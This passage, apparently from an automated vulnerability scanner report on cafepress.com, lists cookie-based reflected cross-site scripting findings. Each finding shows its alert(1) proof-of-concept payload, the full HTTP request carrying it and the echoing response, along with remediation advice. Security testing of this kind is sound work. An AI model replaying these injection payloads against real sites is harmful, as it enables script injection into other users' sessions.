HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 59198 Date: Sun, 26 Dec 2010 13:47:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/ Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59198 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAdd70c"-alert(1)-"1bb61056447 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.13. http://www.cafepress.com/+baby-bodysuits [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-bodysuits
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d208f</script><script>alert(1)</script>60e92653a56 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-bodysuits HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d208f</script><script>alert(1)</script>60e92653a56 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59220 Date: Sun, 26 Dec 2010 13:47:24 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/ Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59220 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'd208f</script><script>alert(1)</script>60e92653a56 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.14. http://www.cafepress.com/+baby-hat [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-hat
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50827"-alert(1)-"00860494a78 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-hat HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA50827"-alert(1)-"00860494a78 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 58548 Date: Sun, 26 Dec 2010 13:47:22 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:22 GMT; path=/ Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:22 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58548 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA50827"-alert(1)-"00860494a78 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.15. http://www.cafepress.com/+baby-hat [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-hat
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93433</script><script>alert(1)</script>a643f06e2bf was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-hat HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=93433</script><script>alert(1)</script>a643f06e2bf ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 58578 Date: Sun, 26 Dec 2010 13:47:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:20 GMT; path=/ Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:20 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58578 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '93433</script><script>alert(1)</script>a643f06e2bf ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_0...[SNIP]...
1.16. http://www.cafepress.com/+bags [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+bags
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ab65"-alert(1)-"48e2c7462b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+bags HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA4ab65"-alert(1)-"48e2c7462b ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 59555 Date: Sun, 26 Dec 2010 13:47:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:18 GMT; path=/ Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:18 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59555 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA4ab65"-alert(1)-"48e2c7462b "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.17. http://www.cafepress.com/+bags [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+bags
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91e0a</script><script>alert(1)</script>2ef0362a154 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+bags HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=91e0a</script><script>alert(1)</script>2ef0362a154 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59583 Date: Sun, 26 Dec 2010 13:47:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59583 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '91e0a</script><script>alert(1)</script>2ef0362a154 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.18. http://www.cafepress.com/+boxers [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+boxers
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload baa43"-alert(1)-"4cc6f92795 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
